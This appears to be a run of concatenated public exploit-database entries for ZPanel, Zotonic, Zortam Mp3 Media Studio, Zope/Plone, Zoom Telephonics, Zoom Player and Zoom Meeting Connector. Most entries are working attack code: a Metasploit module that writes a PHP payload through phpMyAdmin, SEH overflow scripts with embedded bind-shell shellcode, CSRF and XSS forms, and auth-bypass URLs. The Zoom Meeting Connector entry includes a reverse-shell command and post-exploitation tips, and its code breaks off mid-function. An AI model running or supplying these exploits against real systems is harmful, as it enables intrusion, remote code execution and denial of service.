print_good("CSRF token = #{token}")
return cookies, token, sid
else
print_error('CSRF token could not be identified...')
end
else
print_error('PHPSESSID could not be identified...')
end
end
def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id)
old_cookies = cookies
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('etc', 'apps', 'phpmyadmin', 'index.php'),
'cookie' => cookies,
'ctype' => 'application/x-www-form-urlencoded',
'headers'=>
{
'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
},
'vars_post' => {
'pma_username' => uname,
'pma_password' => passwd,
'server' => '1',
'lang' => 'en',
'collation_connection' => 'utf8_general_ci',
'token' => token
}
})
cookies = "#{res.get_cookies}"
old_cookies = old_cookies.split("; ")
cookies = cookies.split("; ")
new_cookies = "#{old_cookies[0]}; "
new_cookies << "#{old_cookies[1]}; "
new_cookies << "#{old_cookies[2]}; "
new_cookies << "#{old_cookies[3]}; "
new_cookies << "#{cookies[0]}; "
new_cookies << "#{cookies[1]} "
new_cookies << "#{sess_id}"
token = get_token_from_url(res['Location'])
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('etc', 'apps', 'phpmyadmin', 'index.php'),
'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
'cookie' => new_cookies,
'vars_get' => {
'token' => token
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while attempting to login to phpMyAdmin')
end
if res.code == 200 and res.body.to_s =~ /phpMyAdmin is more friendly with a/
print_good('PHPMyAdmin login successful!')
return new_cookies, token
end
end
def do_sql(cookies, token, uri)
fname = "#{rand_text_alpha_upper(5)}.php"
sql_stmt = "SELECT \"<?php #{payload.encoded} ?>\" INTO OUTFILE \"/etc/zpanel/panel/#{fname}\""
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('etc', 'apps', 'phpmyadmin', 'import.php'),
'cookie' => cookies,
'ctype' =>'application/x-www-form-urlencoded; charset=UTF-8',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest',
'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/server_sql.php?token=#{token}"
},
'vars_post' => {
'is_js_confirmed' => '0',
'token' => token,
'pos' => '0',
'goto' => 'server_sql.php',
'message_to_show' => 'Your+SQL+query+has+been+executed+successfully',
'prev_sql_query' => '',
'sql_query' => sql_stmt,
'sql_delimiter' => ';',
'show_query' => '1',
'ajax_request' => 'true',
'_nocache' => rand.to_s[2..19].to_i
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out when attempting to upload payload')
end
if res.body =~ /"success":true/
print_good("'#{fname}' successfully uploaded")
print_good("A privilege escalation exploit can be found 'exploits/linux/local/zpanel_zsudo'")
print_status("Executing '#{fname}' on the remote host")
res = send_request_cgi({
'method'=>'GET',
'uri'=>normalize_uri("#{uri}", "#{fname}")
})
else
print_error("#{res.body.to_s}")
end
end
def exploit
# Checking pChart
res = send_request_cgi({
'method'=> 'GET',
'uri'=> normalize_uri("#{datastore['URI']}", 'etc', 'lib', 'pChart2', 'examples', 'index.php')
})
# if pChart is vuln version
if res.body =~ /pChart 2\.x/
uname, passwd, db_name = dot_dot_slash("#{datastore['URI']}")
if uname.length > 0 && passwd.length > 0
print_good('Directory traversal successful, Username/Password identified!')
print_good("Username: #{uname}")
print_good("Password: #{passwd}")
print_good("DB Name: #{db_name}")
cookies, token, sess_id = grab_sess_and_token("#{datastore['URI']}")
print_status('Logging into PHPMyAdmin now')
cookies, token = login_phpmyadmin("#{datastore['URI']}", uname, passwd, cookies, token, sess_id)
print_status('Uploading malicious payload now')
do_sql(cookies, token, "#{datastore['URI']}")
else
print_error('It appears that the directory traversal was unsuccessful...')
end
else
print_error("It appears that the version of pChart is not vulnerable...")
end
end
end
# Exploit Title: Zotonic <=0.46 mod_admin (Erlang) - Reflective Cross-Site Scripting
# Date: 24-04-2019
# Exploit Author: Ramòn Janssen
# Researchers: Jan-martin Sijs, Joost Quist, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: http://zotonic.com/
# Software Link: https://github.com/zotonic/zotonic/releases/tag/0.46.0
# Version: <=0.46
# CVE : CVE-2019-11504
Attack type
Remote
Impact
Code Execution
Zotonic versions prior to 0.47 have multiple authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in the management module. The vulnerabilitie can be exploited when an authenticated user with administrative permissions visits the crafted URL (i.e. when phished or visits a website containing the URL). The XSS effects the following URLs and parameters of the management module:
- /admin/overview/ [qcat, qcustompivot, qs]
- /admin/users/ [qs]
- /admin/media/ [qcat,qcustompivot, qs]
Example: https://[host]/admin/overview?qcustompivot="><script>prompt(‘XSS’)</script>
Affected source code file zotonic_mod_admin:
- zotonic_mod_admin_identity\priv\templates\_admin_sort_header.tpl
- zotonic_mod_admin_identity\priv\templates\admin_users.tpl
Reference(s)
http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel_0.47.0.html
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80
#!/usr/bin/perl
$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
$seh = "\x62\x59\x01\x10"; # seh overwrite
$nop = "\x90" x 12; # NOP sled
# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes
$payload =
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
"\x9b\xec\xb0\xa9\x89";
$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
#Version: 24.15
#Exploit Author: Manpreet Singh Kheberi
#Date: December 13 2018
#Download Link: https://www.zortam.com/download.html
#Vendor Homepage: https://www.zortam.com
#Tested on: Windows Xp Sp3 x64
#Type: Bind shell
print "-----------------------------------------------------------------------------------------------------------------------"
print " Zortam MP3 media studio Exploit (SEH) "
print " by Manpreet Singh Kheberi "
print "Generated File zortam-exploit.txt "
print "INSTRUCTIONS:"
print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
print "-----------------------------------------------------------------------------------------------------------------------"
filename = "zortam-exploit.txt"
junk = "\x41"*268
nseh="\x90\x90\xeb\x12"
seh ="\x8e\x32\xb5\x02"
nop="\x90"*19
brk="\x90\x90\x90\x90"
# bind shell generated using metasploit
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
# This will open a bind shell on port 4444
# use ncat Target-IP 4444
buf = ""
buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30"
buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26"
buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb"
buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f"
buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7"
buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35"
buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad"
buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d"
buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33"
buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79"
buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d"
buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1"
buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed"
buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e"
buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd"
buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35"
buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4"
buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69"
buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29"
buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3"
buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09"
buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4"
buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f"
buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0"
buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c"
buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12"
buf += "\x68\x33\x89\x37"
#boom+= "\xCC\xCC\xCC\xCC"
#calc.exe
# Used for initial exploit development phase
bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
exploit = junk+nseh+seh+nop+brk+buf
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()
# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-19
# Homepage: https://www.zortam.com
# Software Link: https://www.zortam.com/download.html
# Tested Version: 23.95
# Tested on OS: Windows 7 x64
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Once inside of the program click "Continue". In the new window paste the content of
# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 2000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
#!/usr/bin/python
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.zortam.com/
# Version: 23.45
# Tested on: Windows 7 32 bit
# Date: 12/04/2018
# Vendor did not respond to advisory
# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field
filename="zortamPOC.txt"
junk = "A" * 268
nseh = "B" * 4
seh="C" * 4
fill = "D" *900
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.zortam.com/
# Software Link: http://www.zortam.com/download.html
# Version: Software Version 21.15
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec
1. Description:
Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions granting any user full permission to the exe. This allows opportunity for code execution against any other user running the application.
2. Proof
C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
3. Exploit:
Simply replace zmmspro.exe and wait for execution.
#-*- coding: utf-8 -*-
#
# Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS
# Date: 2016-03-12
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.zortam.com
# Software Link: http://www.zortam.com/download.html
# Version: 20.15
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
#
# Detail..
# 1. Zortam Mp3 Media Studio is program that change tags sound file
# 2. If tag length over certain length, program is occured crash.
# 3. Make mp3 file. title tag length is 3000.
# 4. program open. and serching Directory
id3Id = '\x49\x44\x33' #ID3
id3Version = '\x03\x00'
id3Flag = '\x00'
id3Size = '\x00\x00\x2F\x2D'
id3 = id3Id + id3Version + id3Flag + id3Size
frameId = '\x54\x49\x54\x32' #TIT2
frameSize = '\x00\x00\x0B\xB9' #Frame Size
frameFlag = '\x00\x00'
textEncoding = '\x00'
textInfo = 'A'*3000
frame = frameId + frameSize + frameFlag + textEncoding + textInfo
padding = '\x00'*1100
payload = id3 + frame + padding
with open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3','wb') as f:
f.write(payload)
'''
STATUS_STACK_BUFFER_OVERRUN encountered
(aa4.c08): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640
eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll -
kernel32!FormatMessageA+0x14031:
7619e109 cc int 3
0:000> !exchain
0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)
0012f2b8: 41414141
Invalid exception stack at 41414141
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt
Vendor:
================================
www.zope.org
plone.org
Product:
================================
Zope Management Interface 4.3.7
Zope is a Python-based application server for building secure and highly
scalable web applications.
Plone Is a Content Management System built on top of the open source
application server Zope
and the accompanying Content Management Framework.
Vulnerability Type:
===================
Cross site request forgery (CSRF)
Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope
Management Interface).
Patches to Zope and Plone for multiple CSRF issues.
https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope
https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf
CVE Reference:
==============
NA
Vulnerability Details:
=====================
Security vulnerability: 20151006 - CSRF
ZMI is mostly unprotected from CSRF vulnerabilities.
Versions affected
4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5,
4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2
4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4,
4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6
3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3
All versions of Plone prior to 5.x are vulnerable.
Fixed by
Nathan Van Gheem, of the Plone Security Team
Coordinated by Plone Security Team
patch was released and is available from
https://pypi.python.org/pypi/plone4.csrffixes
Exploit code(s):
===============
<!DOCTYPE>
<html>
<head>
<title>Plone CSRF Add Linxs & Persistent XSS</title>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" method="post" action="
http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.6666666666/atct_edit
">
<input type="text" name="title" id="title" value="HYP3RLINX"
size="30" maxlength="255" placeholder="" />
<input type="text" name="remoteUrl" id="remoteUrl" value="
http://hyp3rlinx.altervista.org" size="30" maxlength="511" placeholder="" />
<input type="hidden" name="fieldset" value="default" />
<input type="hidden" name="form.submitted" value="1" />
</form>
2) CSRF to Persistent XSS - Zope Management Interface
++++++++++++++++++++++++++++++++++++++++++++++++++++++
Persistent XSS via CSRF on title change properties tab, this will execute
on each Zope page accessed by users.
CSRF to Persistent XSS POC Code:
=================================
<form id="HELL" action="http://localhost:8080/" method="post">
<input type="text" name="title:UTF-8:string" size="35"
value="</title><script>alert('XSS by hyp3rlinx 08302015')</script>" />
<input name="manage_editProperties:method" value="Save Changes" />
</form>
Disclosure Timeline:
=========================================================
Vulnerability reported: 2015-08-30
Hotfix released: 2015-10-06
Exploitation Technique:
=======================
Remote
Vector NETWORK
Complexity LOW
Authentication NONE
Confidentiality NONE
Integrity PARTIAL
Availability PARTIAL
Severity Level:
=========================================================
6.4 – MEDIUM
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Zope Management Interface & all
versions of Plone prior to 5.x are vulnerable.
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/61044/info
Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability.
Exploiting these issues could allow an attacker to gain unauthorized access and perform arbitrary actions, obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs
--Menu Banner
http://www.example.com/hag/pages/toc.htm
-Advanced Options Menu
http://www.example.com/hag/pages/toolbox.htm
Example commands that can be executed remotely through a web browser
URL, or a modified HTTP GET/POST requests-
-Change Password for admin Account
On Firmware 2.5 or lower
http://www.example.com/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=
admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes
On Firmware 3.0-
http://www.example.com/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_pa
ram1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes
-Clear Logs
http://www.example.com/Action?id=76&cmdClear+Log=Clear+Log
-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always
result in a long term Denial of Service attack.
http://www.example.com/Action?reboot_loc=1&id=5&cmdReboot=Reboot
-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateac
count"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes
On Firmware 3.0-
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser
_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Sa
ve+Changes
source: https://www.securityfocus.com/bid/54249/info
Zoom Player is prone to a remote denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.
Zoom Player 4.51 is vulnerable; other versions may also be affected.
#------------------------------------------------------------------------#
# #
# Usage : perl zoom.pl #
# #
#------------------------------------------------------------------------#
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3
\xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c
\x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c
\x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58
\x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9
\xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a
\xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) .
# to close the Zoom player you have to use the Windows Task Manager .
my $file = "darkexploit.avi";
open ($File, ">$file");
print $File $h;
close ($File);
#-------------------------------------------------------------------------------
# Exploit Title: Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)
# Date: 12-29-2020
# Exploit Author: Jeremy Brown
# Vendor Homepage: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector
# Software Link: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector
# Version: 4.6.239.20200613
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# zoomer.py
#
# Zoom Meeting Connector Post-auth Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# The Meeting Connector Web Console listens on port 5480. On the dashboard
# under Network -> Proxy, one can enable a proxy server. All of the fields
# are sanitized to a certain degree, even the developers noting in the proxy()
# function within backend\webconsole\WebConsole\net.py that they explicitly
# were concerned with command injection and attempted to prevent it:
#
# if ('"' in proxy_name) or ('"' in proxy_passwd): # " double quotes cannot be used to prevent shell injection
# is_valid = False
#
# It makes sense to leave some flexibility in the character limits here
# passwords are often expected to contain more than alphanumeric characters.
# But of course that means the Proxy Password field is still vulnerable to
# command injection with the ` character.
#
# The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
# Every three minutes, a task runs which executes this proxy script as root.
# After submission the dashboard says “The proxy will take effect after the
# server reboot!”, but the commands will still be executed within actually
# requiring a reboot. Keep in mind that the commands will be executed blind.
#
# For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
# this in the /tmp/proxy_test file:
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
#
# MMR was tested, but Controller and VRC may also be vulnerable
#
# Usage
# > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
# login succeeded
# command sent to server
#
# $ nc -u -lvp 5555
# ....
# sh: no job control in this shell
# sh-4.2# pwd
# /root
# sh-4.2#
#
# setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
# check tokens in /opt/zoom/conf/register, check out the local environment, etc.
#
# Dependencies
# - pip install pyquery
#
# Fix
# Zoom says they've fixed this in the latest version
#
import os
import sys
import argparse
import requests
import urllib.parse
from pyquery import PyQuery
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class Zoomer(object):
def __init__(self, args):
self.target = args.target
self.port = args.port
self.username = args.username
self.password = args.password
self.command = args.command
def run(self):
target = "https://" + self.target + ':' + str(self.port)
session = requests.Session()
session.verify = False
#
# get csrftoken from /login and use it to auth with creds
#
try:
resp = session.get(target + "/login")
except Exception as error:
print("Error: %s" % error)
return -1
try:
csrftoken = resp.headers['set-cookie'].split(';')[0]
except:
print("Error: couldn't parse csrftoken from response header")
return -1
